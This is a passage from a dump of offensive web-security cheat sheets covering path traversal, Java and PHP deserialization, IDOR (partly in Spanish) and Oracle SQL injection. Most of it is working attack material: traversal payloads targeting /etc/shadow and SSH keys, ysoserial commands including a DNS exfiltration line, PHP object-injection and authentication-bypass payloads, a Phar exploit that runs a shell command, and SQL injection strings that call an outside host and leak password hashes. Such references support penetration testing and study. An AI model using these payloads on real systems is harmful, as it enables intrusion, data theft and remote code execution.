files](#interesting-windows-files) 19 | 20 | 21 | ## Tools 22 | 23 | - [dotdotpwn - https://github.com/wireghoul/dotdotpwn](https://github.com/wireghoul/dotdotpwn) 24 | ```powershell 25 | git clone https://github.com/wireghoul/dotdotpwn 26 | perl dotdotpwn.pl -h 10.10.10.10 -m ftp -t 300 -f /etc/shadow -s -q -b 27 | ``` 28 | 29 | ## Basic exploitation 30 | 31 | We can use the `..` characters to access the parent directory, the following strings are several encoding that can help 
you bypass a poorly implemented filter. 32 | 33 | ```powershell 34 | ../ 35 | ..\ 36 | ..\/ 37 | %2e%2e%2f 38 | %252e%252e%252f 39 | %c0%ae%c0%ae%c0%af 40 | %uff0e%uff0e%u2215 41 | %uff0e%uff0e%u2216 42 | ``` 43 | 44 | Classic Exploitation 45 | ``` 46 | https://insecure-website.com/loadImage?filename=..\..\..\windows\win.ini 47 | ``` 48 | 49 | Bypass Blocked with Absolute Path 50 | ``` 51 | GET /image?filename=/etc/passwd 52 | ``` 53 | 54 | Bypass Traversal Sequences Stripped Non-Recursively 55 | ``` 56 | GET /image?filename=....//....//....//....//....//....//etc/passwd 57 | ``` 58 | 59 | Bypass with Superfluous URL-decode 60 | ``` 61 | GET /image?filename=..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd 62 | ``` 63 | 64 | Bypass Validation of Start of Path 65 | ``` 66 | GET /image?filename=/var/www/images/../../../../../../etc/passwd 67 | ``` 68 | 69 | Bypass Validation of File Extension with Null Byte (%00) 70 | ``` 71 | GET /image?filename=../../../../../../../etc/passwd%00.jpg 72 | ``` 73 | 74 | ### 16 bits Unicode encoding 75 | 76 | ```powershell 77 | . = %u002e 78 | / = %u2215 79 | \ = %u2216 80 | ``` 81 | 82 | ### UTF-8 Unicode encoding 83 | 84 | ```powershell 85 | . = %c0%2e, %e0%40%ae, %c0ae 86 | / = %c0%af, %e0%80%af, %c0%2f 87 | \ = %c0%5c, %c0%80%5c 88 | ``` 89 | 90 | ### Bypass "../" replaced by "" 91 | Sometimes you encounter a WAF which remove the "../" characters from the strings, just duplicate them. 92 | 93 | ```powershell 94 | ..././ 95 | ...\.\ 96 | ``` 97 | 98 | ### Bypass "../" with ";" 99 | 100 | ```powershell 101 | ..;/ 102 | http://domain.tld/page.jsp?include=..;/..;/sensitive.txt 103 | ``` 104 | 105 | ### Double URL encoding 106 | 107 | ```powershell 108 | . 
= %252e 109 | / = %252f 110 | \ = %255c 111 | ``` 112 | 113 | **e.g:** Spring MVC Directory Traversal Vulnerability (CVE-2018-1271) with `http://localhost:8080/spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini` 114 | 115 | ### UNC Bypass 116 | 117 | An attacker can inject a Windows UNC share ('\\UNC\share\name') into a software system to potentially redirect access to an unintended location or arbitrary file. 118 | 119 | ```powershell 120 | \\localhost\c$\windows\win.ini 121 | ``` 122 | 123 | ### NGINX/ALB Bypass 124 | 125 | NGINX in certain configurations and ALB can block traversal attacks in the route, For example: 126 | ```http://nginx-server/../../``` will return a 400 bad request. 127 | 128 | To bypass this behaviour just add forward slashes in front of the url: 129 | ```http://nginx-server////////../../``` 130 | 131 | 132 | ## Path Traversal 133 | 134 | ### Interesting Linux files 135 | 136 | ```powershell 137 | /etc/issue 138 | /etc/passwd 139 | /etc/shadow 140 | /etc/group 141 | /etc/hosts 142 | /etc/motd 143 | /etc/mysql/my.cnf 144 | /proc/[0-9]*/fd/[0-9]* (first number is the PID, second is the filedescriptor) 145 | /proc/self/environ 146 | /proc/version 147 | /proc/cmdline 148 | /proc/sched_debug 149 | /proc/mounts 150 | /proc/net/arp 151 | /proc/net/route 152 | /proc/net/tcp 153 | /proc/net/udp 154 | /proc/self/cwd/index.php 155 | /proc/self/cwd/main.py 156 | /home/$USER/.bash_history 157 | /home/$USER/.ssh/id_rsa 158 | /var/run/secrets/kubernetes.io/serviceaccount 159 | /var/lib/mlocate/mlocate.db 160 | /var/lib/mlocate.db 161 | ``` 162 | 163 | ### Interesting Windows files 164 | 165 | Always existing file in recent Windows machine. 166 | Ideal to test path traversal but nothing much interesting inside... 
167 | 168 | ```powershell 169 | c:\windows\system32\license.rtf 170 | c:\windows\system32\eula.txt 171 | ``` 172 | 173 | Interesting files to check out (Extracted from https://github.com/soffensive/windowsblindread) 174 | 175 | ```powershell 176 | c:/boot.ini 177 | c:/inetpub/logs/logfiles 178 | c:/inetpub/wwwroot/global.asa 179 | c:/inetpub/wwwroot/index.asp 180 | c:/inetpub/wwwroot/web.config 181 | c:/sysprep.inf 182 | c:/sysprep.xml 183 | c:/sysprep/sysprep.inf 184 | c:/sysprep/sysprep.xml 185 | c:/system32/inetsrv/metabase.xml 186 | c:/sysprep.inf 187 | c:/sysprep.xml 188 | c:/sysprep/sysprep.inf 189 | c:/sysprep/sysprep.xml 190 | c:/system volume information/wpsettings.dat 191 | c:/system32/inetsrv/metabase.xml 192 | c:/unattend.txt 193 | c:/unattend.xml 194 | c:/unattended.txt 195 | c:/unattended.xml 196 | c:/windows/repair/sam 197 | c:/windows/repair/system 198 | ``` 199 | 200 | The following log files are controllable and can be included with an evil payload to achieve a command execution 201 | 202 | ```powershell 203 | /var/log/apache/access.log 204 | /var/log/apache/error.log 205 | /var/log/httpd/error_log 206 | /usr/local/apache/log/error_log 207 | /usr/local/apache2/log/error_log 208 | /var/log/nginx/access.log 209 | /var/log/nginx/error.log 210 | /var/log/vsftpd.log 211 | /var/log/sshd.log 212 | /var/log/mail 213 | ``` 214 | -------------------------------------------------------------------------------- /Web Application/Insecure Deserialization/JAVA.md: -------------------------------------------------------------------------------- 1 | # Java Deserialization 2 | 3 | ## Detection 4 | 5 | - "AC ED 00 05" in Hex 6 | - "rO0" in Base64 7 | - Content-type = "application/x-java-serialized-object" 8 | - "H4sIAAAAAAAAAJ" in gzip(base64) 9 | 10 | ## Exploit 11 | 12 | [ysoserial](https://github.com/frohoff/ysoserial) : A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization. 
13 | 14 | ```java 15 | java -jar ysoserial.jar CommonsCollections1 calc.exe > commonpayload.bin 16 | java -jar ysoserial.jar Groovy1 calc.exe > groovypayload.bin 17 | java -jar ysoserial-master-v0.0.4-g35bce8f-67.jar Groovy1 'ping 127.0.0.1' > payload.bin 18 | java -jar ysoserial.jar Jdk7u21 bash -c 'nslookup `uname`.[redacted]' | gzip | base64 19 | ``` 20 | 21 | payload | author | dependencies | impact (if not RCE) 22 | ------|--------|------ |------ 23 | BeanShell1 |@pwntester, @cschneider4711 |bsh:2.0b5 24 | C3P0 |@mbechler |c3p0:0.9.5.2, mchange-commons-java:0.2.11 25 | Clojure |@JackOfMostTrades |clojure:1.8.0 26 | CommonsBeanutils1 |@frohoff |commons-beanutils:1.9.2, commons-collections:3.1, commons-logging:1.2 27 | CommonsCollections1 |@frohoff |commons-collections:3.1 28 | CommonsCollections2 |@frohoff |commons-collections4:4.0 29 | CommonsCollections3 |@frohoff |commons-collections:3.1 30 | CommonsCollections4 |@frohoff |commons-collections4:4.0 31 | CommonsCollections5 |@matthias_kaiser, @jasinner |commons-collections:3.1 32 | CommonsCollections6 |@matthias_kaiser |commons-collections:3.1 33 | FileUpload1 |@mbechler |commons-fileupload:1.3.1, commons-io:2.4 | file uploading 34 | Groovy1 |@frohoff |groovy:2.3.9 35 | Hibernate1 |@mbechler| 36 | Hibernate2 |@mbechler| 37 | JBossInterceptors1 |@matthias_kaiser |javassist:3.12.1.GA, jboss-interceptor-core:2.0.0.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21 38 | JRMPClient |@mbechler| 39 | JRMPListener |@mbechler| 40 | JSON1 |@mbechler |json-lib:jar:jdk15:2.4, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2, commons-lang:2.6, ezmorph:1.0.6, commons-beanutils:1.9.2, spring-core:4.1.4.RELEASE, commons-collections:3.1 41 | JavassistWeld1 |@matthias_kaiser |javassist:3.12.1.GA, weld-core:1.1.33.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21 42 | Jdk7u21 |@frohoff| 43 | Jython1 |@pwntester, 
@cschneider4711 |jython-standalone:2.5.2 44 | MozillaRhino1 |@matthias_kaiser |js:1.7R2 45 | Myfaces1 |@mbechler| 46 | Myfaces2 |@mbechler| 47 | ROME |@mbechler |rome:1.0 48 | Spring1 |@frohoff |spring-core:4.1.4.RELEASE, spring-beans:4.1.4.RELEASE 49 | Spring2 |@mbechler |spring-core:4.1.4.RELEASE, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2 50 | URLDNS |@gebl| | jre only vuln detect 51 | Wicket1 |@jacob-baines |wicket-util:6.23.0, slf4j-api:1.6.4 52 | 53 | ## Burp extensions using ysoserial 54 | 55 | - [JavaSerialKiller](https://github.com/NetSPI/JavaSerialKiller) 56 | - [Java Deserialization Scanner](https://github.com/federicodotta/Java-Deserialization-Scanner) 57 | - [Burp-ysoserial](https://github.com/summitt/burp-ysoserial) 58 | - [SuperSerial](https://github.com/DirectDefense/SuperSerial) 59 | - [SuperSerial-Active](https://github.com/DirectDefense/SuperSerial-Active) 60 | 61 | ## Other tools 62 | 63 | - [JRE8u20_RCE_Gadget](https://github.com/pwntester/JRE8u20_RCE_Gadget) 64 | - [JexBoss](https://github.com/joaomatosf/jexboss) - JBoss (and others Java Deserialization Vulnerabilities) verify and EXploitation Tool 65 | - [ysoserial-modified](https://github.com/pimps/ysoserial-modified) 66 | - [gadgetprobe](https://labs.bishopfox.com/gadgetprobe) 67 | - [marshalsec](https://github.com/mbechler/marshalsec) - Turning your data into code execution 68 | 69 | ```java 70 | java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.<Marshaller> [-a] [-v] [-t] [<gadget_type> [<arguments...>]] 71 | 72 | where 73 | -a - generates/tests all payloads for that marshaller 74 | -t - runs in test mode, unmarshalling the generated payloads after generating them. 75 | -v - verbose mode, e.g. also shows the generated payload in test mode. 76 | gadget_type - Identifier of a specific gadget, if left out will display the available ones for that specific marshaller. 
77 | arguments - Gadget specific arguments 78 | ``` 79 | 80 | Payload generators for the following marshallers are included:<br /> 81 | 82 | | Marshaller | Gadget Impact 83 | | ------------------------------- | ---------------------------------------------- 84 | | BlazeDSAMF(0&#124;3&#124;X) | JDK only escalation to Java serialization<br/>various third party libraries RCEs 85 | | Hessian&#124;Burlap | various third party RCEs 86 | | Castor | dependency library RCE 87 | | Jackson | **possible JDK only RCE**, various third party RCEs 88 | | Java | yet another third party RCE 89 | | JsonIO | **JDK only RCE** 90 | | JYAML | **JDK only RCE** 91 | | Kryo | third party RCEs 92 | | KryoAltStrategy | **JDK only RCE** 93 | | Red5AMF(0&#124;3) | **JDK only RCE** 94 | | SnakeYAML | **JDK only RCEs** 95 | | XStream | **JDK only RCEs** 96 | | YAMLBeans | third party RCE 97 | 98 | ## References 99 | 100 | - [Github - ysoserial](https://github.com/frohoff/ysoserial) 101 | - [Java-Deserialization-Cheat-Sheet - GrrrDog](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet/blob/master/README.md) 102 | - [Understanding & practicing java deserialization exploits](https://diablohorn.com/2017/09/09/understanding-practicing-java-deserialization-exploits/) 103 | - [How i found a 1500$ worth Deserialization vulnerability - @D0rkerDevil](https://medium.com/@D0rkerDevil/how-i-found-a-1500-worth-deserialization-vulnerability-9ce753416e0a) 104 | - [Misconfigured JSF ViewStates can lead to severe RCE vulnerabilities - 14 Aug 2017, Peter Stöckli](https://www.alphabot.com/security/blog/2017/java/Misconfigured-JSF-ViewStates-can-lead-to-severe-RCE-vulnerabilities.html) 105 | - [Jackson CVE-2019-12384: anatomy of a vulnerability class](https://blog.doyensec.com/2019/07/22/jackson-gadgets.html) 106 | - [On Jackson CVEs: Don’t Panic — Here is what you need to know](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062#da96) 107 | 
-------------------------------------------------------------------------------- /Web Application/Insecure Deserialization/PHP.md: -------------------------------------------------------------------------------- 1 | # PHP Object injection 2 | 3 | PHP Object Injection is an application level vulnerability that could allow an attacker to perform different kinds of malicious attacks, such as Code Injection, SQL Injection, Path Traversal and Application Denial of Service, depending on the context. The vulnerability occurs when user-supplied input is not properly sanitized before being passed to the unserialize() PHP function. Since PHP allows object serialization, attackers could pass ad-hoc serialized strings to a vulnerable unserialize() call, resulting in an arbitrary PHP object(s) injection into the application scope. 4 | 5 | The following magic methods are the usual entry points for a PHP Object Injection (which one matters depends on what the application does with the injected object): 6 | 7 | * __wakeup() (and, since PHP 7.4, __unserialize()) runs as soon as the object is unserialized. 8 | * __destruct() runs when the object is destroyed (last reference dropped or end of script), so it fires even if the application never touches the unserialize() result. 9 | * __toString() runs when the object is used in a string context (echo, concatenation, string comparison); __call()/__get() and the other overloading methods only run if the application later calls a method or reads a property on the injected object. 10 | 11 | Also check the `phar://` stream wrapper: filesystem functions given a user-controlled path (`file_exists()`, `is_file()`, `getimagesize()`, `file_get_contents()`, ...) unserialize the archive's metadata without any explicit unserialize() call, so a path-injection/LFI-style sink can be turned into an object injection (see [PHP Phar Deserialization](#php-phar-deserialization)). 12 | 13 | ## Summary 14 | 15 | * [General concept](#general-concept) 16 | * [Authentication bypass](#authentication-bypass) 17 | * [Finding and using gadgets](#finding-and-using-gadgets) 18 | * [Real world examples](#real-world-examples) 19 | * [PHP Phar Deserialization](#php-phar-deserialization) 20 | * [References](#references) 21 | 22 | ## General concept 23 | 24 | Vulnerable code: 25 | 26 | ```php 27 | <?php 28 | class PHPObjectInjection{ 29 | public $inject; 30 | function __construct(){ 31 | } 32 | function __wakeup(){ 33 | if(isset($this->inject)){ 34 | eval($this->inject); 35 | } 36 | } 37 | } 38 | if(isset($_REQUEST['r'])){ 39 | $var1=unserialize($_REQUEST['r']); 40 | if(is_array($var1)){ 41 | echo "<br/>".$var1[0]." 
- ".$var1[1]; 42 | } 43 | } 44 | else{ 45 | echo ""; # nothing happens here 46 | } 47 | ?> 48 | ``` 49 | 50 | Craft a payload that reuses a class already loaded by the application (here `PHPObjectInjection`, whose `__wakeup()` evals the `inject` property): 51 | 52 | ```php 53 | # Basic serialized data 54 | a:2:{i:0;s:4:"XVWA";i:1;s:33:"Xtreme Vulnerable Web Application";} 55 | 56 | # Command execution (var_dump() output of serialize(); the payload to send is the quoted string) 57 | string(68) "O:18:"PHPObjectInjection":1:{s:6:"inject";s:17:"system('whoami');";}" 58 | ``` 59 | 60 | ## Authentication bypass 61 | 62 | ### Type juggling 63 | 64 | Vulnerable code: 65 | 66 | ```php 67 | <?php 68 | $data = unserialize($_COOKIE['auth']); 69 | 70 | if ($data['username'] == $adminName && $data['password'] == $adminPassword) { 71 | $admin = true; 72 | } else { 73 | $admin = false; 74 | } 75 | ``` 76 | 77 | Payload: 78 | 79 | ```php 80 | a:2:{s:8:"username";b:1;s:8:"password";b:1;} 81 | ``` 82 | 83 | Because `true == "str"` is true under PHP's loose comparison (`==`): a non-empty string converts to `true`, so `b:1` matches any non-empty `$adminName`/`$adminPassword`. It does not work against strict comparison (`===`) or `hash_equals()`, nor when the stored value is falsy (`""` or `"0"`). 84 | 85 | ### Object reference 86 | 87 | Vulnerable code: 88 | 89 | ```php 90 | <?php 91 | class Object 92 | { 93 | var $guess; 94 | var $secretCode; 95 | } 96 | 97 | $obj = unserialize($_GET['input']); 98 | 99 | if($obj) { 100 | $obj->secretCode = rand(500000,999999); 101 | if($obj->guess === $obj->secretCode) { 102 | echo "Win"; 103 | } 104 | } 105 | ?> 106 | ``` 107 | 108 | Payload: 109 | 110 | ```php 111 | O:6:"Object":2:{s:10:"secretCode";N;s:4:"guess";R:2;} 112 | ``` 113 | 114 | `R:2` is a back-reference to the second value in the serialized stream (the object itself is value 1, `secretCode` is value 2), so `guess` and `secretCode` become the same variable and the strict comparison holds after `secretCode` is overwritten. (`Object` has been a reserved class name since PHP 7.2; rename the class if you reproduce this sample.) The same trick works with arrays, e.g. to make `hmac` equal whatever `admin_hash` is later set to: 115 | 116 | ```php 117 | a:2:{s:10:"admin_hash";N;s:4:"hmac";R:2;} 118 | ``` 119 | 120 | ## Finding and using gadgets 121 | 122 | Also called "PHP POP Chains", they can be used to gain RCE on the system. 
123 | 124 | [PHPGGC](https://github.com/ambionics/phpggc) is a tool built to generate the payload based on several frameworks: 125 | 126 | - Laravel 127 | - Symfony 128 | - SwiftMailer 129 | - Monolog 130 | - SlimPHP 131 | - Doctrine 132 | - Guzzle 133 | 134 | ```powershell 135 | phpggc monolog/rce1 'phpinfo();' -s 136 | ``` 137 | 138 | ## PHP Phar Deserialization 139 | 140 | Using the `phar://` wrapper, one can trigger a deserialization of the archive's serialized metadata as soon as a filesystem function touches the file, e.g. `file_get_contents("phar://./archives/app.phar")`. The archive must already be on the target (upload, writable temp directory, ...) and its file name is irrelevant: the format is recognised by the `__HALT_COMPILER();` marker in the stub, not by the extension. On PHP 8.0 and later the metadata is no longer unserialized automatically by filesystem operations (only by `Phar::getMetadata()`), so this vector mainly applies to PHP 7.x targets. 141 | 142 | A valid PHAR includes four elements: 143 | 144 | 1. Stub 145 | 2. Manifest 146 | 3. File Contents 147 | 4. Signature 148 | 149 | Example of a Phar creation in order to exploit a custom `PDFGenerator` (a stand-in for a gadget class present on the target — presumably one whose magic method calls `$this->callback($this->fileName)`; the class and property names must match the target's). Run it with `php -d phar.readonly=0 poc.php`: creating or modifying a Phar is refused while `phar.readonly` is on, which is the default. 150 | 151 | ```php 152 | <?php 153 | class PDFGenerator { } 154 | 155 | //Create a new instance of the Dummy class and modify its property 156 | $dummy = new PDFGenerator(); 157 | $dummy->callback = "passthru"; 158 | $dummy->fileName = "uname -a > pwned"; //our payload 159 | 160 | // Delete any existing PHAR archive with that name 161 | @unlink("poc.phar"); 162 | 163 | // Create a new archive 164 | $poc = new Phar("poc.phar"); 165 | 166 | // Add all write operations to a buffer, without modifying the archive on disk 167 | $poc->startBuffering(); 168 | 169 | // Set the stub 170 | $poc->setStub("<?php echo 'Here is the STUB!'; __HALT_COMPILER();"); 171 | 172 | /* Add a new file in the archive with "text" as its content*/ 173 | $poc["file"] = "text"; 174 | // Add the dummy object to the metadata. 
This will be serialized 175 | $poc->setMetadata($dummy); 176 | // Stop buffering and write changes to disk 177 | $poc->stopBuffering(); 178 | ?> 179 | ``` 180 | 181 | 182 | ## Real world examples 183 | 184 | * [Vanilla Forums ImportController index file_exists Unserialize Remote Code Execution Vulnerability - Steven Seeley](https://hackerone.com/reports/410237) 185 | * [Vanilla Forums Xenforo password splitHash Unserialize Remote Code Execution Vulnerability - Steven Seeley](https://hackerone.com/reports/410212) 186 | * [Vanilla Forums domGetImages getimagesize Unserialize Remote Code Execution Vulnerability (critical) - Steven Seeley](https://hackerone.com/reports/410882) 187 | * [Vanilla Forums Gdn_Format unserialize() Remote Code Execution Vulnerability - Steven Seeley](https://hackerone.com/reports/407552) 188 | 189 | ## References 190 | 191 | * [PHP Object Injection - OWASP](https://www.owasp.org/index.php/PHP_Object_Injection) 192 | * [PHP Object Injection - Thin Ba Shane](http://location-href.com/php-object-injection/) 193 | * [PHP unserialize](http://php.net/manual/en/function.unserialize.php) 194 | * [PHP Generic Gadget - ambionics security](https://www.ambionics.io/blog/php-generic-gadget-chains) 195 | * [POC2009 Shocking News in PHP Exploitation](https://www.owasp.org/images/f/f6/POC2009-ShockingNewsInPHPExploitation.pdf) 196 | * [PHP Internals Book - Serialization](http://www.phpinternalsbook.com/classes_objects/serialization.html) 197 | * [TSULOTT Web challenge write-up from MeePwn CTF 1st 2017 by Rawsec](https://rawsec.ml/en/meepwn-2017-write-ups/#TSULOTT-Web) 198 | * [CTF writeup: PHP object injection in kaspersky CTF](https://medium.com/@jaimin_gohel/ctf-writeup-php-object-injection-in-kaspersky-ctf-28a68805610d) 199 | * [Jack The Ripper Web challeneg Write-up from ECSC 2019 Quals Team France by Rawsec](https://rawsec.ml/en/ecsc-2019-quals-write-ups/#164-Jack-The-Ripper-Web) 200 | * [Rusty Joomla RCE Unserialize 
overflow](https://blog.hacktivesecurity.com/index.php?controller=post&action=view&id_post=41) 201 | * [PHP Pop Chains - Achieving RCE with POP chain exploits. - Vickie Li - September 3, 2020](https://vkili.github.io/blog/insecure%20deserialization/pop-chains/) 202 | * [How to exploit the PHAR Deserialization Vulnerability - Alexandru Postolache - May 29, 2020](https://pentest-tools.com/blog/exploit-phar-deserialization-vulnerability/) 203 | -------------------------------------------------------------------------------- /Web Application/IDOR/README.md: -------------------------------------------------------------------------------- 1 | # IDOR 2 | 3 | Las referencias directas a objetos inseguras se producen cuando una aplicación proporciona acceso directo a objetos en función de la entrada proporcionada por el usuario. Como resultado de esta vulnerabilidad, los atacantes pueden eludir la autorización y acceder a los recursos del sistema directamente, por ejemplo, registros o archivos de bases de datos. 4 | 5 | ## Summary 6 | 7 | * [Tools](#tools) 8 | * [Exploit](#exploit) 9 | * [Lugares Poco Comunes](#lugares-poco-comunes) 10 | * [IDs Hasheados](#ids-hasheados) 11 | * [Adivinar IDs](#adivinar-ids) 12 | * [HPP con IDOR](#hpp-con-idor) 13 | * [Blind IDORs](#blind-idors) 14 | * [Cambiar el Método de la Request](#cambiar-el-metodo-de-la-request) 15 | * [Cambiar el Tipo de Archivo Solicitado](#cambiar-el-tipo-de-archivo-solicitado) 16 | * [Envolver ID en un Array](#envolver-id-en-un-array) 17 | * [Cómo Aumentar el Impacto de las IDOR](#como-aumentar-el-impacto-de-las-idors) 18 | * [Examples](#examples) 19 | 20 | 21 | 22 | ## Tools 23 | 24 | - Burp Suite plugin Authz 25 | - Burp Suite plugin AuthMatrix 26 | - Burp Suite plugin Authorize 27 | 28 | 29 | ## Exploit 30 | 31 | <img src="https://user-images.githubusercontent.com/43796175/115991665-326f6680-a58f-11eb-8b3a-117cf32d8710.png"></img> 32 | 33 | The value of a parameter is used directly to retrieve a database record. 
34 | 35 | ```powershell 36 | http://foo.bar/somepage?invoice=12345 37 | ``` 38 | 39 | The value of a parameter is used directly to perform an operation in the system 40 | 41 | ```powershell 42 | http://foo.bar/changepassword?user=someuser 43 | ``` 44 | 45 | The value of a parameter is used directly to retrieve a file system resource 46 | 47 | ```powershell 48 | http://foo.bar/showImage?img=img00011 49 | ``` 50 | 51 | The value of a parameter is used directly to access application functionality 52 | 53 | ```powershell 54 | http://foo.bar/accessPage?menuitem=12 55 | ``` 56 | 57 | ## Lugares Poco Comunes 58 | 59 | No ignore los ID codificados y con hash. 60 | 61 | Cuando se enfrenta a un ID codificado, es posible decodificar el ID utilizando esquemas de codificación comunes. 62 | 63 | Y si la aplicación utiliza una identificación hash aleatoria, vea si la identificación es predecible. 64 | 65 | A veces, las aplicaciones utilizan algoritmos que producen una entropía insuficiente y, como tal, los ID se pueden predecir después de un análisis cuidadoso. 66 | 67 | En este caso, intente crear algunas cuentas para analizar cómo se crean estos ID. Es posible que pueda encontrar un patrón que le permita predecir las ID que pertenecen a otros usuarios. 68 | 69 | Si los ID de referencia de objeto parecen impredecibles, vea si hay algo que pueda hacer para manipular el proceso de creación o vinculación de estos ID de objeto. 70 | 71 | ## IDs Hasheados 72 | 73 | No siempre es tan fácil como cambiar su `ID` de usuario por otro `ID`, a veces es no puede adivinar el `ID` asociado, como se muestra a continuación: 74 | ``` 75 | POST /challenge/users/vfd3f0jkui4555kJNJHahh023 76 | Host: vulnerable.com 77 | 78 | userID=8f14e45fceea167a5a36dedd4bea2543 79 | ``` 80 | 81 | Observando el ID del user `8f14e45fceea167a5a36dedd4bea2543`, podría pensar que es una identificación aleatoria que es imposible adivinar, pero puede que no sea el caso. 
82 | 83 | Es una práctica común [HASHEAR](https://www.md5online.org/md5-decrypt.html) el `ID` de los usarios antes de almacenarlos en una base de datos, así que tal vez eso sea lo que está sucediendo aquí: 84 | 85 | <img src="https://user-images.githubusercontent.com/43796175/122650815-85324e00-d0fa-11eb-89d8-b7d63db9120a.jpg"> 86 | 87 | Luego, hashee los números correspondientes para obtener su IDOR. 88 | 89 | ## Adivinar IDs 90 | 91 | Si no se utilizan ID en la solicitud generada por la aplicación, intente agregarlo a la solicitud. Intente agregar `id`, `user_id`, `message_id` u otros parámetros de referencia de objeto y vea si hace una diferencia en el comportamiento de la aplicación. 92 | 93 | Por ejemplo, si esta solicitud muestra todos sus mensajes directos: 94 | 95 | ``` 96 | GET /api_v1/messages 97 | ``` 98 | 99 | Entonces, ¿esta request mostraría los mensajes de otro usuario? 100 | 101 | ``` 102 | GET /api_v1/messages?user_id=ANOTHER_USERS_ID 103 | ``` 104 | 105 | ## HPP con IDOR 106 | 107 | Las vulnerabilidades de HPP (que proporcionan múltiples valores para el mismo parámetro) también pueden conducir a IDOR. 108 | 109 | Es posible que las aplicaciones no anticipen que el usuario envíe varios valores para el mismo parámetro y, al hacerlo, puede bypassear el control de acceso establecido en el endpoint. 110 | 111 | Se vería así. 
Si esta solicitud falla: 112 | 113 | ``` 114 | GET /api_v1/messages?user_id=[ANOTHER_USERS_ID] 115 | ``` 116 | 117 | Prueba esto: 118 | 119 | ``` 120 | GET /api_v1/messages?user_id=[YOUR_USER_ID]&user_id=[ANOTHER_USERS_ID] 121 | ``` 122 | 123 | O esto: 124 | 125 | ``` 126 | GET /api_v1/messages?user_id=[ANOTHER_USERS_ID]&user_id=[YOUR_USER_ID] 127 | ``` 128 | 129 | O proporcione los parámetros como una lista: 130 | 131 | ``` 132 | GET /api_v1/messages?user_ids[]=[YOUR_USER_ID]&user_ids[]=[ANOTHER_USERS_ID] 133 | ``` 134 | 135 | ## Blind IDOR 136 | 137 | A veces, los endpoints susceptibles a IDOR no responden directamente con la información filtrada. En su lugar, podrían llevar a la aplicación a filtrar información en otro lugar: en archivos de exportación, correos electrónicos y tal vez incluso alertas de texto. 138 | 139 | ## Cambiar el Método de la Request 140 | 141 | Si un método de solicitud no funciona, hay muchos otros que puede probar en su lugar: GET, POST, PUT, DELETE, PATCH ... 142 | 143 | Un truco común que funciona es sustituir POST por PUT o viceversa: 144 | ¡es posible que no se hayan implementado los mismos controles de acceso! 145 | 146 | ## Cambiar el Tipo de Archivo Solicitado 147 | 148 | A veces, cambiar el tipo de archivo del fichero solicitado puede llevar a que el servidor procese la autorización de manera diferente. Por ejemplo, intente agregar `.json` al final de la URL de solicitud y vea qué sucede. 149 | 150 | ## Envolver ID en un Array 151 | 152 | ``` 153 | {“id”:111} --> 401 Unauthriozied 154 | {“id”:[111]} --> 200 OK 155 | ``` 156 | 157 | ``` 158 | {“id”:111} --> 401 Unauthriozied 159 | {“id”:{“id”:111}} --> 200 OK 160 | ``` 161 | 162 | ## Cómo Aumentar el Impacto de las IDOR 163 | 164 | ### IDOR Críticas Primero 165 | 166 | Siempre busque IDOR en funcionalidades críticas primero. 167 | 168 | Los IDOR basados en lectura y escritura pueden tener un gran impacto. 
169 | 170 | En términos de IDOR de cambio de estado (escritura), restablecimiento de contraseña, cambio de contraseña, IDOR de recuperación de cuenta a menudo tienen el mayor impacto comercial. (Digamos, en comparación con un IDOR de "cambiar la configuración de suscripción de correo electrónico"). 171 | 172 | En cuanto a los IDOR que no cambian de estado (lectura), busque funcionalidades que manejen la información confidencial en la aplicación. 173 | 174 | Por ejemplo, busque funcionalidades que manejen mensajes directos, información confidencial del usuario y contenido privado. Considere qué funcionalidades de la aplicación utilizan esta información y busque los IDOR en consecuencia. 175 | 176 | 177 | ## Examples 178 | 179 | * [HackerOne - IDOR to view User Order Information - meals](https://hackerone.com/reports/287789) 180 | * [HackerOne - IDOR on HackerOne Feedback Review - japz](https://hackerone.com/reports/262661) 181 | -------------------------------------------------------------------------------- /Web Application/SQL Injection/Intruder/Oracle_All.txt: -------------------------------------------------------------------------------- 1 | ' BEGIN DBMS_LOCK.SLEEP(15); END; 2 | ’ or ‘1’=’1 3 | ' or '1'='1 4 | '||utl_http.request('httP://192.168.1.1/')||' 5 | ' || myappadmin.adduser('admin', 'newpass') || ' 6 | ' AND 1=utl_inaddr.get_host_address((SELECT banner FROM v$version WHERE ROWNUM=1)) AND 'i'='i 7 | ' AND 1=utl_inaddr.get_host_address((SELECT SYS.LOGIN_USER FROM DUAL)) AND 'i'='i 8 | ' AND 1=utl_inaddr.get_host_address((SELECT SYS.DATABASE_NAME FROM DUAL)) AND 'i'='i 9 | ' AND 1=utl_inaddr.get_host_address((SELECT host_name FROM v$instance)) AND 'i'='i 10 | ' AND 1=utl_inaddr.get_host_address((SELECT global_name FROM global_name)) AND 'i'='i 11 | ' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(USERNAME)) FROM SYS.ALL_USERS)) AND 'i'='i 12 | ' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(PASSWORD)) FROM SYS.USER$)) AND 'i'='i 13 | 
